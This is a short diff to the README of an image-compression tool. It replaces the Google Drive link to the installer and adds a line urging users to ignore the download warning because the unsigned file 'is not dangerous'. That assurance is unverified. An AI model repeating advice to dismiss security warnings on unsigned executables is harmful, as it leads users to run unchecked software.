kyleotoole91/ImageCompressor/README.md

 This currently only supports .JPG image files.

-The installer can be downloaded from this link https://drive.google.com/file/d/1Jee02JEiYA5mq21h_p7YR6k9aWNmeg2k/view?usp=sharing
+The installer can be downloaded from this link https://drive.google.com/file/d/1Gh6SnPt8ks1C5eLjeiiic-AR-IENs4yE/view?usp=sharing
-Extract the executable from the archive and run it to install.

-Please make a donation if you found this program usefull https://www.paypal.me/TurboImageCompressor
+Please ignore the warning, the file is not dangerous, it simply hasn't been signed yet or downloaded enough times.

 # License